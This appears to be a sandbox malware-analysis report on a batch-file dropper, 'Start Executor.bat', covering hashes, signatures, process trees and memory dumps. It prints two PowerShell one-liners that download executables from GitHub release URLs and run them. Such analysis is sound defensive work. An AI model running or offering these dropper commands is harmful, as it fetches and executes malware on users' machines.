6afbbef338a695004853bb806f146efdd2d216a1fa58cb34fd10509495b4415b

Analysis

max time kernel
77s
max time network
81s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
12/07/2024, 20:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Start Executor.bat
Size

551B
MD5

fe821790779e191b514f7d90b381d191
SHA1

03be2cfc52ec390a30209c33f7ea3a42589a0785
SHA256

6afbbef338a695004853bb806f146efdd2d216a1fa58cb34fd10509495b4415b
SHA512

425cdb0bd257a71a952293c77984635484dd30a6fc8c9f287100a99016ffc51a884442595eb6eed102fcbceebb6b01f609ba45f5fb2535a3156a8eef04ab50aa

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://github.com/vlyian/scorpix/releases/download/vypix/Scorpix-ExecutorV3.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://github.com/vlyian/scorpixe/releases/download/vypix/ScorpixDLL.exe

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
3	2064	powershell.exe
4	2064	powershell.exe
6	3060	powershell.exe
7	3060	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2064	powershell.exe
3060	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2064	powershell.exe
Token: SeDebugPrivilege	3060	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2508 wrote to memory of 2064	2508	cmd.exe	30
PID 2508 wrote to memory of 2064	2508	cmd.exe	30
PID 2508 wrote to memory of 2064	2508	cmd.exe	30
PID 2508 wrote to memory of 3060	2508	cmd.exe	31
PID 2508 wrote to memory of 3060	2508	cmd.exe	31
PID 2508 wrote to memory of 3060	2508	cmd.exe	31

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Start Executor.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2508
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell $down=New-Object System.Net.WebClient;$url='https://github.com/vlyian/scorpix/releases/download/vypix/Scorpix-ExecutorV3.exe';$file='Scorpix-ExecutorV3.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2064
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell $down=New-Object System.Net.WebClient;$url='https://github.com/vlyian/scorpixe/releases/download/vypix/ScorpixDLL.exe';$file='ScorpixDLL.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3060

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
bbbd657d0a0b9541d07602fc3823882e

SHA1
c71e244465c2513cf847e7087ef34ed05c49a64d

SHA256
762ddc836e3e8d684711371eae034b69aaa3d313c7a8600f98ca473928a1f353

SHA512
0e5c9b932889bc8cf736dca9dd690a4fc4e6fea17d94f9698252c6922c30f019a2dc86228db83ea608d99afa1afa6af2e0ed99739f8a59ff91758f1450e1241e

Download Submit
memory/2064-10-0x000007FEF58E0000-0x000007FEF627D000-memory.dmp

Filesize
9.6MB

Download
memory/2064-6-0x0000000002020000-0x0000000002028000-memory.dmp

Filesize
32KB

Download
memory/2064-7-0x000007FEF58E0000-0x000007FEF627D000-memory.dmp

Filesize
9.6MB

Download
memory/2064-8-0x000007FEF58E0000-0x000007FEF627D000-memory.dmp

Filesize
9.6MB

Download
memory/2064-9-0x000007FEF58E0000-0x000007FEF627D000-memory.dmp

Filesize
9.6MB

Download
memory/2064-4-0x000007FEF5B9E000-0x000007FEF5B9F000-memory.dmp

Filesize
4KB

Download
memory/2064-11-0x000007FEF58E0000-0x000007FEF627D000-memory.dmp

Filesize
9.6MB

Download
memory/2064-12-0x000007FEF58E0000-0x000007FEF627D000-memory.dmp

Filesize
9.6MB

Download
memory/2064-13-0x000007FEF5B9E000-0x000007FEF5B9F000-memory.dmp

Filesize
4KB

Download
memory/2064-15-0x000007FEF58E0000-0x000007FEF627D000-memory.dmp

Filesize
9.6MB

Download
memory/2064-5-0x000000001B320000-0x000000001B602000-memory.dmp

Filesize
2.9MB

Download
memory/3060-21-0x000000001B1B0000-0x000000001B492000-memory.dmp

Filesize
2.9MB

Download
memory/3060-22-0x00000000024E0000-0x00000000024E8000-memory.dmp

Filesize
32KB

Download